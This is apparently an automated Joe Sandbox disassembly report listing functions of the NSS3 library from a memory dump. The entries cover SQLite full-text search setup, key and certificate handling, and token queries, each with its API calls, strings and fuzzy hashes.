Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 29d919ce349efaed3066fedd60d693a5a46398de015070fb81ccdafcbfac9d93
Instruction ID: 9febd46a86399f622502ccbb0f8835241bcd9d47234399e9e18b45c5471edd53
Opcode Fuzzy Hash: 29d919ce349efaed3066fedd60d693a5a46398de015070fb81ccdafcbfac9d93
Instruction Fuzzy Hash: A322D071A04300AFE700CF14DD45B9A77E1AF8430CF29866CE8595B792E732F999CB96

Function 6CA5ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CA5ED38

Part of subcall function 6C9F4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9F4FC4

sqlite3_mprintf.NSS3(snippet), ref: 6CA5EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6CA5EFE4

Part of subcall function 6CB1DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C9F5001,?,00000003,00000000), ref: 6CB1DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6CA5F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6CA5F129
sqlite3_mprintf.NSS3(optimize), ref: 6CA5F1D1
sqlite3_free.NSS3(?), ref: 6CA5F368

Strings

fts3tokenize, xrefs: 6CA5F30F
fts3, xrefs: 6CA5F247
fts4aux, xrefs: 6CA5ECF9
optimize, xrefs: 6CA5F199, 6CA5F1CC, 6CA5F211
fts3_tokenizer, xrefs: 6CA5EE1A, 6CA5EEA8
porter, xrefs: 6CA5ED97
matchinfo, xrefs: 6CA5F04F, 6CA5F082, 6CA5F0C2, 6CA5F0F2, 6CA5F124, 6CA5F169
offsets, xrefs: 6CA5EFAF, 6CA5EFDF, 6CA5F01F
simple, xrefs: 6CA5ED79
unicode61, xrefs: 6CA5EDB5
snippet, xrefs: 6CA5EF05, 6CA5EF37, 6CA5EF7C
fts4, xrefs: 6CA5F2AD

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 9eb2cd23c46bef03ebbd4a46d09b71a6162206f42798b56753e02dadac62a5a6
Instruction ID: 5263518a9bd8a14fcb3e32384837d4b7aac7567ff1d77452cc57a58af2f294c3
Opcode Fuzzy Hash: 9eb2cd23c46bef03ebbd4a46d09b71a6162206f42798b56753e02dadac62a5a6
Instruction Fuzzy Hash: 1B0205B5B043804BE7049F719C5673F32B5BBC5218F58C53CD86A97B01EB75E89A8B82

Function 6CAD7C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAD7C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6CAD7C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6CAD7D1E

Part of subcall function 6CAD7870: SECOID_FindOID_Util.NSS3(?,?,?,6CAD91C5), ref: 6CAD788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAD7D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6CAD7D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CAD7DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAD7DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAD7DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CAD7E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6CAD7E58

Part of subcall function 6CAD7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CAD91C5), ref: 6CAD78BB
Part of subcall function 6CAD7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6CAD91C5), ref: 6CAD78FA
Part of subcall function 6CAD7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6CAD91C5), ref: 6CAD7930
Part of subcall function 6CAD7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CAD91C5), ref: 6CAD7951
Part of subcall function 6CAD7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CAD7964
Part of subcall function 6CAD7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CAD797A
Part of subcall function 6CAD7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CAD7988
Part of subcall function 6CAD7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6CAD7998
Part of subcall function 6CAD7870: free.MOZGLUE(00000000), ref: 6CAD79A7
Part of subcall function 6CAD7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6CAD91C5), ref: 6CAD79BB
Part of subcall function 6CAD7870: PR_GetCurrentThread.NSS3(?,?,?,?,6CAD91C5), ref: 6CAD79CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAD7E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAD7F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CAD7F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAD7FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAD7FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6CAD8038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CAD8050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CAD8093
SECOID_FindOID_Util.NSS3 ref: 6CAD7F29

Part of subcall function 6CAD07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA78298,?,?,?,6CA6FCE5,?), ref: 6CAD07BF
Part of subcall function 6CAD07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CAD07E6
Part of subcall function 6CAD07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD081B
Part of subcall function 6CAD07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD0825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CAD8072
SECOID_FindOID_Util.NSS3 ref: 6CAD80F5

Part of subcall function 6CADBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CAD800A,00000000,?,00000000,?), ref: 6CADBC3F

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: 17e795bc8f5c4bad9c28c183222a6b59df2c238b8a469debcb3e5cd5cd078947
Instruction ID: fcbadf01fb0eb5b6d375f3fd0b175f2370ad91d7577e35147586cb593ea870db
Opcode Fuzzy Hash: 17e795bc8f5c4bad9c28c183222a6b59df2c238b8a469debcb3e5cd5cd078947
Instruction Fuzzy Hash: A0E1AF716093019FD714CF28D980B5AB7E5AF44308F16092DE88ADBB55E731FC89CB92

Function 6CA61C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6CA61C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6CA61C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6CA61CA1
GetLengthSid.ADVAPI32(?), ref: 6CA61CA9
malloc.MOZGLUE(00000000), ref: 6CA61CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6CA61CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CA61CE4
GetLengthSid.ADVAPI32(?), ref: 6CA61CEC
malloc.MOZGLUE(00000000), ref: 6CA61CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6CA61D0F
CloseHandle.KERNEL32(?), ref: 6CA61D17
AllocateAndInitializeSid.ADVAPI32 ref: 6CA61D4D
GetLastError.KERNEL32 ref: 6CA61D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CA61D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CA61D7A

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: b3896a12619fd9d426b2422c09ca2812420c0ec5586419a1a2b95185a55270dd
Instruction ID: 76b7beb14eb3ec0f61bc2288efcd4ba9b4ab9982a105e3c095e35aa141bc645d
Opcode Fuzzy Hash: b3896a12619fd9d426b2422c09ca2812420c0ec5586419a1a2b95185a55270dd
Instruction Fuzzy Hash: 223173B1A00218AFEF10EF64CD48BAA7BB8FF5E345F044065FA09A3650E7305A94CF65

Function 6CAEC8C0 Relevance: 25.9, APIs: 17, Instructions: 432COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAECA51
TlsGetValue.KERNEL32 ref: 6CAECAE8
EnterCriticalSection.KERNEL32(?), ref: 6CAECAFC
PK11_FreeSymKey.NSS3(00000000), ref: 6CAECB2E
PK11_KeyGen.NSS3(?,?,00000000,00000000,?), ref: 6CAECB87
memset.VCRUNTIME140(?,00000000,00000410), ref: 6CAECBA8
PR_SetError.NSS3(FFFFE028,00000000), ref: 6CAECCCD
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAECCE1
PK11_PubDeriveWithKDF.NSS3 ref: 6CAECD3D
memcpy.VCRUNTIME140(?,?,?), ref: 6CAECD73
memcpy.VCRUNTIME140(?,?,?), ref: 6CAECD9D
PK11_WrapSymKey.NSS3(?,00000000,?,00000000,?), ref: 6CAECDDA
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6CAECE04
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CAECE17
PK11_FreeSymKey.NSS3(00000000), ref: 6CAECE24
PR_Unlock.NSS3 ref: 6CAECE49
PK11_FreeSymKey.NSS3(00000000), ref: 6CAECE96

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: K11_$ErrorFree$Destroymemcpy$CriticalDeriveEnterPrivatePublicSectionUnlockValueWithWrapmemset
String ID:
API String ID: 3685077037-0
Opcode ID: d5cb4a95d4a5d96372133b5c30f0744c48bfdbcece62efad4ef1b892c9a65b99
Instruction ID: 9adc61f508bc4f1e198bccb69c9199cad7f405f5290f134bdafeed57f68db6eb
Opcode Fuzzy Hash: d5cb4a95d4a5d96372133b5c30f0744c48bfdbcece62efad4ef1b892c9a65b99
Instruction Fuzzy Hash: F5F1C5B1D012288BEB10EE54CC807AA7BB5EF4930CF1841A9D919A7B41E734DED4DBD6

Function 6CA63D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CA63DFB
__allrem.LIBCMT ref: 6CA63EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA63FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6CA64047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA640DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA6415F
__allrem.LIBCMT ref: 6CA6416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA64288
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA642AB
__allrem.LIBCMT ref: 6CA642B7

Strings

%02d, xrefs: 6CA64086
%lld, xrefs: 6CA63FB2
%04d, xrefs: 6CA6407B
%03d, xrefs: 6CA642E8

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: fa4e0bdf7514f2adba7341f3a61c5e269a38582b268f2e393b16b2cdf25d3caa
Instruction ID: 64c934a72812076c1b04514c33b4580e1b2eb1d8dfc3a2e172d4780b174e96c1
Opcode Fuzzy Hash: fa4e0bdf7514f2adba7341f3a61c5e269a38582b268f2e393b16b2cdf25d3caa
Instruction Fuzzy Hash: 19F1F271A087409FD715CF39C891A6BB7F6AF86308F188A2DF48597A51E734D8868B42

Function 6CA6EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA6EF63

Part of subcall function 6CA787D0: PORT_NewArena_Util.NSS3(00000800,6CA6EF74,00000000), ref: 6CA787E8
Part of subcall function 6CA787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6CA6EF74,00000000), ref: 6CA787FD
Part of subcall function 6CA787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CA7884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6CA6F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA6F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6CA6F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6CA6F374
PL_strcasecmp.NSS3(6CBB2FD4,?), ref: 6CA6F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6CA6F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CA6F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CA6F67D
CERT_DestroyName.NSS3(?), ref: 6CA6F68B

Part of subcall function 6CA78320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6CA78338
Part of subcall function 6CA78320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CA78364
Part of subcall function 6CA78320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6CA7838E
Part of subcall function 6CA78320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA783A5
Part of subcall function 6CA78320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA783E3

Part of subcall function 6CA784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6CA784D9
Part of subcall function 6CA784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CA78528

Part of subcall function 6CA78900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6CA6F599,?,00000000), ref: 6CA78955

Strings

", xrefs: 6CA6F21B
*, xrefs: 6CA6F3C6
oid., xrefs: 6CA6F2CF

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 5a9d46fa529d71d624bb8cbb92f6274bced6582dd45b2230998de5e22e8572eb
Instruction ID: df15ccded898df443ea5b961ae6a1a7685ae175c2475d7353ed883ae8dfa8f5e
Opcode Fuzzy Hash: 5a9d46fa529d71d624bb8cbb92f6274bced6582dd45b2230998de5e22e8572eb
Instruction Fuzzy Hash: C822387560C3418BD710CE2BCC903AAB7E6AB85358F184A2EE5D587F91E7319C85CB93

Function 6CA11C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA11D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA11EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6CA11FB7

Strings

sqlite_master, xrefs: 6CA11C61
unsupported file format, xrefs: 6CA12188
table, xrefs: 6CA11C8B
unknown error, xrefs: 6CA12291
another row available, xrefs: 6CA12287
sqlite_temp_master, xrefs: 6CA11C5C
abort due to ROLLBACK, xrefs: 6CA12223
attached databases must use the same text encoding as main database, xrefs: 6CA120CA
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6CA11F83
no more rows available, xrefs: 6CA12264

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: 2eb36cbca4757a0166916906beb198ce52e4ece64deb4a92bedd550a60070e83
Instruction ID: 62b023ea57cf0432f899eb5aaf2a8b42ed54f629119d8d5941cb67888f8ab179
Opcode Fuzzy Hash: 2eb36cbca4757a0166916906beb198ce52e4ece64deb4a92bedd550a60070e83
Instruction Fuzzy Hash: 4D128F7060C7419FD705CF19C084A6AB7F2BF96318F18866DE9998BB51D731EC86CB82

Function 6CADEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CADC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CADDAE2,?), ref: 6CADC6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CADF0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CADF0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6CADF101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CADF11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CBA218C), ref: 6CADF183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6CADF19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CADF1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CADF1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CADF210

Part of subcall function 6CA852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6CADF1E9,?,00000000,?,?), ref: 6CA852F5
Part of subcall function 6CA852D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6CA8530F
Part of subcall function 6CA852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6CA85326
Part of subcall function 6CA852D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6CADF1E9,?,00000000,?,?), ref: 6CA85340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CADF227

Part of subcall function 6CACFAB0: free.MOZGLUE(?,-00000001,?,?,6CA6F673,00000000,00000000), ref: 6CACFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6CADF23E

Part of subcall function 6CACBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CA7E708,00000000,00000000,00000004,00000000), ref: 6CACBE6A
Part of subcall function 6CACBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CA804DC,?), ref: 6CACBE7E
Part of subcall function 6CACBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CACBEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CADF2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CADF3A8

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CADF3B3

Part of subcall function 6CA82D20: PK11_DestroyObject.NSS3(?,?), ref: 6CA82D3C
Part of subcall function 6CA82D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CA82D5F

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: c2294c6dcff8122188746be4347d2a50614e3d92f928fd059eb85b69b29812fc
Instruction ID: 95e1ba26ff8ac524aa918586cc28b711f406b69df71d6220c1aa5481ba127639
Opcode Fuzzy Hash: c2294c6dcff8122188746be4347d2a50614e3d92f928fd059eb85b69b29812fc
Instruction Fuzzy Hash: B5D15CB6E012059BEB04CFA9DD80A9FB7B5EF48308F1A812DD925A7711E731F885CB50

Function 6CB0DE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6CAE7FFA,00000000,?,6CB123B9,00000002,00000000,?,6CAE7FFA,00000002), ref: 6CB0DE33

Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390AB
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390C9
Part of subcall function 6CB39090: EnterCriticalSection.KERNEL32 ref: 6CB390E5
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB39116
Part of subcall function 6CB39090: LeaveCriticalSection.KERNEL32 ref: 6CB3913F

Part of subcall function 6CB0D000: PORT_ZAlloc_Util.NSS3(00000108,?,6CB0DE74,6CAE7FFA,00000002,?,?,?,?,?,00000000,6CAE7FFA,00000000,?,6CB123B9,00000002), ref: 6CB0D008

PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6CAE7FFA,00000000,?,6CB123B9,00000002,00000000,?,6CAE7FFA,00000002), ref: 6CB0DE57
memset.VCRUNTIME140(?,00000000,00000088), ref: 6CB0DEA5
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB0E069
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB0E121
